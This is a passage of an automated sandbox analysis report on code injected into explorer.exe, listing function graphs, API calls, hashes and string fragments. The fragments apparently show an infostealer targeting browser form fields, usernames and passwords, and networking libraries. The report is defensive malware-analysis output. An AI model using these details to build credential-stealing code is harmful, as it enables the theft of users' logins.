                                                                                                                              control_flow_graph 412 115da5b2-115da5ea 413 115da5ec-115da604 call 115dd942 412->413 414 115da60a-115da62b socket 412->414 413->414
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: socket
                                                                                                                              • String ID: sock
                                                                                                                              • API String ID: 98920635-2415254727
                                                                                                                              • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                              • Instruction ID: 7cb7f721a61583ca2e81c53e7b2d70f839b9b304e48e593f8f1b0219b630e38e
                                                                                                                              • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                              • Instruction Fuzzy Hash: FC0121706187188FCB84DF5CD048B55BBE0FB99314F1545ADE45ECB266C7B0C981CB86
                                                                                                                              Function 115D22DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 417 115d22dd-115d2320 call 115dd942 420 115d23fa-115d240e 417->420 421 115d2326 417->421 422 115d2328-115d2339 SleepEx 421->422 422->422 423 115d233b-115d2341 422->423 424 115d234b-115d2352 423->424 425 115d2343-115d2349 423->425 427 115d2354-115d235a 424->427 428 115d2370-115d2376 424->428 425->424 426 115d235c-115d236a call 115dcf12 425->426 426->428 427->426 427->428 429 115d2378-115d237e 428->429 430 115d23b7-115d23bd 428->430 429->430 432 115d2380-115d238a 429->432 433 115d23bf-115d23cf call 115d2e72 430->433 434 115d23d4-115d23db 430->434 432->430 436 115d238c-115d23b1 call 115d3432 432->436 433->434 434->422 438 115d23e1-115d23f5 call 115d20f2 434->438 436->430 438->422
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                              • Instruction ID: 10bca8d9fc46c62776b297be4d382a4f4a24a72c13561f598803e4b6bbefc755
                                                                                                                              • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                              • Instruction Fuzzy Hash: 8D317A74A04B4ADFDF54DF2D80882A9B7A1FB94355F44467EC92DCB206CB34A490CFA1
                                                                                                                              Function 115D2412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 453 115d2412-115d2446 call 115dd942 456 115d2448-115d2472 call 115dfc9e CreateThread 453->456 457 115d2473-115d247d 453->457
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                              • Instruction ID: 3efa953e2f2f57765ccc069dc8eb3c0133103d6d1699be17f70ba6471823c554
                                                                                                                              • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                              • Instruction Fuzzy Hash: 4AF0F634268B494FDB88EF2CD44563AF7E0FBE8215F41063EA94DC3264DA39D5824756

                                                                                                                              Non-executed Functions

                                                                                                                              Function 10A15D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                              • API String ID: 0-393284711
                                                                                                                              • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                              • Instruction ID: 51f89c19e5360dad1435fc6a85bb81912851d7c9d8b15c7e1514bcaa3cc2583b
                                                                                                                              • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                              • Instruction Fuzzy Hash: DAE17B74618F488FCBA4DF68C5857AAB7E1FB58301F404A2EA59FCB241DF30A541CB85
                                                                                                                              Function 1087AD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                              • API String ID: 0-393284711
                                                                                                                              • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                              • Instruction ID: 3b5e8fcc3c4f9af293940eb83fbf5b73f2f1fb121fb2ec155551e7913ab0beb2
                                                                                                                              • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                              • Instruction Fuzzy Hash: 7EE1697461CF488FCBA4DF68C4957AAB7E1FB58300F504A2EA59FC7255EF30A5018B89
                                                                                                                              Function 10A18792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                              • API String ID: 0-2916316912
                                                                                                                              • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                              • Instruction ID: 1f0ba8495bf5472b95f5e1dec70badbfe9b6a2b636623bbc648856b9da53d28d
                                                                                                                              • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                              • Instruction Fuzzy Hash: 97B18D30518B488EDB55DF68D486AEEB7F2FF58300F50452EE49ACB252EF70A445CB86
                                                                                                                              Function 1087D792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                              • API String ID: 0-2916316912
                                                                                                                              • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                              • Instruction ID: 2dbf8535cf493f8be2ab803a2a4e1e533c2673f1480c3b15bb4394d0daed56a4
                                                                                                                              • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                              • Instruction Fuzzy Hash: 65B19A30518B488EDB58EF68C486AEEB7F1FF98300F50851EE49AC7255EF70A505CB86
                                                                                                                              Function 10A16622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                              • API String ID: 0-1539916866
                                                                                                                              • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                              • Instruction ID: 8bbc079cc75084612bf35628aab4b9559e531bf521d2d001471935a3240f1d4f
                                                                                                                              • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                              • Instruction Fuzzy Hash: EA41B170A18B088FDB14DF88A44A7BD7BF2FB48704F00425EE449DB245DBB5AD858BD6
                                                                                                                              Function 1087B622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                              • API String ID: 0-1539916866
                                                                                                                              • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                              • Instruction ID: 822169108511317e0bb273fbb95c724564308851a8cf77840d89f4fb45652886
                                                                                                                              • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                              • Instruction Fuzzy Hash: F341B070A1CB08CFDB18DF98A8467AD7BE2FB88740F00425EE509D3245DBB5AD458BD6
                                                                                                                              Function 10A1DAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                              • API String ID: 0-355182820
                                                                                                                              • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                              • Instruction ID: e875c133d629b25ad65ce56690c318fea0b59feaaf98c8327ee63a696eedda0c
                                                                                                                              • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                              • Instruction Fuzzy Hash: 24C16B74618B088FC758EF24D486AAAF3E5FB98304F40472EA59ACB250DF30B555CBC6
                                                                                                                              Function 10882AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                              • API String ID: 0-355182820
                                                                                                                              • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                              • Instruction ID: d7bc2aaabd99402aad12d49d61c19c4054cf88bcbb297de50cfec25e30547d97
                                                                                                                              • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                              • Instruction Fuzzy Hash: 04C15C7521CB098FC758EF68C4866AAF7E1FB94304F40472EA59AC7210DF70B515CB86
                                                                                                                              Function 10A1DF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                              • API String ID: 0-97273177
                                                                                                                              • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                              • Instruction ID: 2ef94e2a6d1f53c4363b9e938e6060ac3bfd007b5348b7cc387a9e21a9c1163f
                                                                                                                              • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                              • Instruction Fuzzy Hash: 4351C6315187488FD709DF14D8816AAB7E5FBC5704F501A2EF9CBCB242DBB49946CB82
                                                                                                                              Function 10882F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                              • API String ID: 0-97273177
                                                                                                                              • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                              • Instruction ID: 0f78ce648794ceb87b37f88ac5c675c14725325f5f18199b6e517ce191dd973d
                                                                                                                              • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                              • Instruction Fuzzy Hash: E651B13561C7488FD709CF18D8816AAB7E5FB85700F505A2FF8CB87251DBB4A906CB82
                                                                                                                              Function 10A172F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                              • API String ID: 0-639201278
                                                                                                                              • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                              • Instruction ID: ca5b59314febc9182f24780965133f0594656e63c039fe8d677aec723a3f4ba1
                                                                                                                              • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                              • Instruction Fuzzy Hash: DCC1A074618A194FC758EF68D496AAAF7E1FB98300F81436DA44ECB251DF30EA41CBC5
                                                                                                                              Function 10A172F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                              • API String ID: 0-639201278
                                                                                                                              • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                              • Instruction ID: 8df902bb4f3718bbf289b35c2b7552f038da19b7bb3f5061971c58910b9c0b01
                                                                                                                              • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                              • Instruction Fuzzy Hash: 2BC1A074618A194FC758EF68D496AAAF7E1FB98300F81436DA44ECB251DF30AA41CBC5
                                                                                                                              Function 1087C2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                              • API String ID: 0-639201278
                                                                                                                              • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                              • Instruction ID: c5a5ffbfa9fbc92efcf1661c235260898b534912faa11ddf48fee998eaf45174
                                                                                                                              • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                              • Instruction Fuzzy Hash: 23C1917461CA194FC758EF68D496AAAB3E1FF98300F51832E944EC7255DF70EA01CB85
                                                                                                                              Function 1087C2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                              • API String ID: 0-639201278
                                                                                                                              • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                              • Instruction ID: bf57deae58521988c863eda96ac48b029c9857181e3dace75e6023dbd2f1a3e8
                                                                                                                              • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                              • Instruction Fuzzy Hash: 48C1927461CA194FC758EF68D496AAAB3E1FF98300F51832E944EC7255DF70EA01CB85
                                                                                                                              Function 10A18CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                              • API String ID: 0-2058692283
                                                                                                                              • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                              • Instruction ID: fc620b2a6aa651385265aa28c3fe05e71cb68e2a41d0a07c1234ca466f362f40
                                                                                                                              • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                              • Instruction Fuzzy Hash: 06A180706187488FDB19DF68D445BEEB7E2FF98300F40462DE48AD7292EF7095858789
                                                                                                                              Function 1087DCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                              • API String ID: 0-2058692283
                                                                                                                              • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                              • Instruction ID: 7d6ca4dc05be438c83d2ae5d73f1f75c621c9afbb29296709b190c535a2a52fd
                                                                                                                              • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                              • Instruction Fuzzy Hash: ECA19F7061CB488BDB19EF689445BEEB7E1FF88300F40862EE48AD7255EE7095458785
                                                                                                                              Function 10A18CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                              • API String ID: 0-2058692283
                                                                                                                              • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                              • Instruction ID: 7db00dd0ae4306eb86260293b2b9c5be042d9b1c2ca3bda4817e4967b01cb5bd
                                                                                                                              • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                              • Instruction Fuzzy Hash: 89918F706187488FDB18DFA8D444BEEB7E2FF98300F40462DE48AD7252EB709585CB89
                                                                                                                              Function 1087DCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                              • API String ID: 0-2058692283
                                                                                                                              • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                              • Instruction ID: 1f35ce07689f6d90386026dfb8c301356f807c4c603411bc9c227ac46f29eb97
                                                                                                                              • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                              • Instruction Fuzzy Hash: 6C918E7061CB488BDB19DFA8D444BEEB7F1FB98300F40862EE48AD7295EF7095458789
                                                                                                                              Function 10A18352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $.$e$n$v
                                                                                                                              • API String ID: 0-1849617553
                                                                                                                              • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                              • Instruction ID: d0eb0c89c6f4395638b71666791e236aaabf2dd24730a1bd785ddf8230c7f63f
                                                                                                                              • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                              • Instruction Fuzzy Hash: DF71B235618B498FD758DFA8D4857AAB7F5FF98304F00062EE44ACB221EF70E9458B85
                                                                                                                              Function 1087D352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $.$e$n$v
                                                                                                                              • API String ID: 0-1849617553
                                                                                                                              • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                              • Instruction ID: 5447bd94f1333e550fda85b01f28e736e237bdd01d19fd6c0473fd5028f5bf8b
                                                                                                                              • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                              • Instruction Fuzzy Hash: 53719D3161CB498FD758EFA8C4856AAB7F1FF98304F00462FE44AC7225EB71A9458B85
                                                                                                                              Function 10A13C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                              • API String ID: 0-1970020201
                                                                                                                              • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                              • Instruction ID: 5ed9bd7019f3ab79a83546b9593abe6e3487eeeefaf16f202565d31e593aa16c
                                                                                                                              • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                              • Instruction Fuzzy Hash: 7B5150B0914B4C8FDB54DF64C0456EEB7F1FF58301F40462EA59AE7254EF30A5818B89
                                                                                                                              Function 10878C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                              • API String ID: 0-1970020201
                                                                                                                              • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                              • Instruction ID: b676c7e1834f04fc397b11b561e3fb790d54b28f195c45fba3403b63d1865aa2
                                                                                                                              • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                              • Instruction Fuzzy Hash: 9A513AB1918B4C8BDB54DFA8C445AEEB7F1FF58300F40462EE59AE7214EF70A5418B89
                                                                                                                              Function 10A1486F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                                              Download Yara Rule
